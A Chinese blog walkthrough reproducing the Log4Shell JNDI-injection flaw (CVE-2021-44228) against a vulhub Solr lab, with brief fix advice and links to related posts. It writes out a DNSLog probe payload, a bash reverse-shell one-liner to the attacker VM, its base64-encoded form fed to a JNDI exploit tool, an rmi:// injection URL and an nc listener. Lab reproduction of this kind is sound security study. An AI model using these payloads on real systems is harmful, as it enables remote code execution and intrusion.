Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)

最新推荐文章于 2024-01-29 16:43:53 发布
最新推荐文章于 2024-01-29 16:43:53 发布
阅读量602 收藏
点赞数 1
分类专栏: 漏洞分析 文章标签: log4j apache java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51331767/article/details/129918655
版权
文章介绍了ApacheLog4j2的日志处理套件中的严重漏洞,允许攻击者通过构造恶意日志消息执行任意代码。漏洞复现过程包括DNSLog验证和反弹shell,而修复措施包括升级Log4j框架、更新JDK、修改配置及使用安全防护产品。
摘要由CSDN通过智能技术生成

一、漏洞背景:

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。

二、漏洞环境:

vulhub.org/#/environments/log4j/CVE-2021-44228/

docker-compose up -d

服务启动后,访问http://your-ip:8983即可查看到Apache Solr的后台页面。

三、漏洞复现:

Ubuntu (192.168.110.163)

kali虚拟机 (192.168.110.141)

exp tools

GitHub - bkfish/Apache-Log4j-Learning: Apache-Log4j漏洞复现笔记

测试该网站存在不存在Apache log4j2漏洞

DNSLog验证

先利用dnslog生成一个用于接收回参的网址

 

通过DNSLog平台(http://www.dnslog.cn/)获取到域名http://xxxxxx,构造payload ${jndi:ldap://http://xxxxxx}

然后我们对目标网站进行测试,访问网址:

http://192.168.110.163:8983/solr/admin/cores?action=${jndi:ldap://xxxxxx}

换成自己的ip和生成的dnslog值即可

 

 

JNDI注入反弹shell

首先到kali中打开我们事先准备好的exp

解压后到tools目录下

构造payload:

bash -i >& /dev/tcp/192.168.110.141/4444 0>&1

这里IP是kali的IP,端口是你等会nc监听的端口

然后我们将这个加密为base64

 

 

使用工具

Java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xNDEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.110.141

 

 

这里会生成两个协议各一个执行命令,这两个协议在log4j2中都有执行权限

我们使用第一个,再次构造一个payload

${jndi:rmi://192.168.110.141:1099/k3snom}

到kali中开启nc

nc -lvvp 4444

 

 

然后我们将这个payload插入到action的后面

http://192.168.110.163:8983/solr/admin/cores?action=${jndi:rmi://192.168.110.141:1099/k3snom}

回车直接访问

nc成功反弹shell

四、修复建议

1.升级将Log4j框架

2.升级jdk

3.修改log4j配置

4.使用安全产品防护

吃我灰流丽
关注
专栏目录
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
代码审计-JNDI分析
cdyunaq的博客
04-06 385
JNDI Java Naming and Directory Interface,Java命名和目录接口,通过调用JNDI的API应用程序可以定位资源和其他程序对象,现在JNDI能访问的服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 JNDI注入 JNDI注入的关键是在用户进行远程方法调用时返回的stub是一个reference类型的对象,且用户本地CLASSPATH不存在该类字节码,导致用户需要加载reference类的字节码,直接返回恶意类字节码命令执行。 Naming Se.
Apache Log4j2 lookup JNDI 注入漏洞CVE-2021-44228
qq_41696518的博客
06-13 950
环境:使用Vulhub的漏洞环境工具:bp和JNDIExploit-1-1.2,需要Java环境!!
Apache Log4j2 lookup JNDI 注入漏洞复现及利用
Tauil的博客
07-21 1194
这时候有过有过js经验的朋友都会知道嗷,编写网站的时候一般都会使用到JNDI这个接口进行目录服务查询,而JNDI中有LDAP的类,他可以用来执行我们的恶意语句,为了方便恶意语句的回显,我们到。查看网络,重新载入一下,看看每个数据包,诶这个时候就会发现有一个数据包存在参数上传,并且URL是在另一个地址。,为什么不用那个,因为啊那个是上传系统参数的数据包,有很大的区别,感兴趣可以自己去搜一下,因为本人java也不是很精通,所以就不多嘴了。并访问,这时我们的攻击机终端就会收到新的消息,这就代表命令。.......
apache log4j 2(CVE-2021-44228)漏洞复现
net的博客
04-04 900
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j
了解JNDIJava中的命名和目录服务接口
鹏鹏2077
06-30 5139
JNDIJava Naming and Directory Interface)是Java平台的一个标准API,用于访问和管理命名和目录服务。它提供了一种通用的方式,使开发人员可以在Java应用程序中查找和绑定各种资源。本文将介绍JNDI的基本概念,并提供代码示例来演示如何在Java应用程序中使用JNDI
vCenter修复Apache log4j2漏洞CVE-2021-44228, CVE-2021-45046)
qq_27248929的博客
12-21 4621
2021年12月Apache log4j远程执行漏洞影响到的VMware产品列表:VMSA-2021-0028.4 (vmware.com)。 本次我们所涉及到的产品及版本是vSphere6.7下的vCenter Server Application6.7.x,以下是加固的配置步骤: 1)首先打开vCenter的shell连接,需从控制台进入vCenter虚机进行配置操作,具体为进入排错模式,Enable shell和SSH选项; 2)打开xshell 通过SSH连接vCenter进行命令行.
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6102
log4j 漏洞CVE-2021-44228 漏洞复现
Log4j2 远程代码执行漏洞cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6303
文章目录1、JNDI、RMI、LDAP、JNDI注入Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞cve-2021-44228复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2374
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
spring-jndi-lookup:如何使用Spring从JNDI查找数据源
05-14
春天jndi查找 如何使用Spring从JNDI查找数据源 Server.xml <资源名称=“ jdbc / javatechie”全局=“ jdbc / javatechie” auth =“容器” type =“ javax.sql.DataSource” driverClassName =“ com.mysql.jdbc.Driver” url =“ jdbc:mysql://本地主机:3306 / javatechie“用户名=” root“密码=”密码“ maxActive="100" maxIdle="20" minIdle="5" maxWait="10000"/> context.xml: 配置: <jee:jndi-lookup id =“ dataSource” jndi-name =“ jdbc / javatechie” Expected
JNDI&RMI&LDAP介绍+log4j分析
enhengzZ的博客
02-16 1631
JNDI JNDIjava Naming and Directory Interfac即java命名与目录接口 Naming是命名服务,Director指目录服务。 通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDIJava EE的重要部分,,JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 命名服务 对资源命名方便下次调用,Naming的资源要唯一,每一个资源绑定一个名字 目录服务 顾名思义,和计算机的文件系统很像,具体来说,dns就是一
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
Makboli的博客
08-26 1273
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
JNDI注入的理解、JDK给出的修复
qq_37432174的博客
11-24 686
攻击目标扮演的相当于是JNDI客户端的角色,攻击者通过搭建一个恶意的RMI服务端来实施攻击。Context.PROVIDER_URL参数表示指定一个远程加载的地址,例如上面的rmi://127.0.0.1:8080,当我们通过lookup函数进行查找对象的时候,其实就是在rmi://127.0.0.1:1099/m1sn0w这个里面进行的查找。当然,如果受害者内部存在漏洞组件存在反序列化漏洞的话,我们可以构造恶意的序列化对象,返回给客户端,当客户端在进行反序列化的时候,可以触发漏洞
log4j漏洞 成因 原理 jndi ldap
whatday的专栏
11-22 682
所以目录天生是用来查询的,就好像它的名字一样。PS:有时候Java对象比较大,直接通过LDAP这些存储不方便,就整了个类似于二次跳转的意思,不直接返回对象内容,而是告诉你对象在哪个class里,让你去那里找。假如现在想要通过日志输出一个Java对象,但这个对象不在程序中,而是在其他地方,比如可能在某个文件中,甚至可能在网络上的某个地方,这种时候怎么办呢?lookup,顾名思义就是查找、搜索的意思,那在log4j2中,就是允许在输出日志的时候,通过某种方式去查找要输出的内容。
封装JNDI操作LDAP服务器的工具类(1)
iteye_17276的博客
01-27 206
封装JNDI操作LDAP服务器的工具类(1) LDAP操作封装类 作者:廖武锋 MSN:liaowufeng1111@hotmail.com QQ:38773367 Email:moaihe1111@163.com 本人为作者原创,若转贴,请保留作者署名,谢谢! LDAP操作封装类  目标:使用者只需要会使用List,Map 数据结构,将对LDAP的操作进行封装 类:主要有三个类 1 Env类...
封装JNDI操作LDAP服务器的工具类2
weixin_33979363的博客
01-13 93
package com.common.ldapconnection;      import java.util.Properties;    import javax.naming.Context;    import javax.naming.NamingException;    import javax.naming.directory.DirContext;    import java...
JNDI注入漏洞的原理和复现
最新发布
Locosomnus的博客
01-29 1717
一篇关于JNDI注入的学习笔记
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
apache log4j CVE-2021-44228漏洞怎么解决
06-03
Apache Log4j 2.x中存在一种命令注入漏洞攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值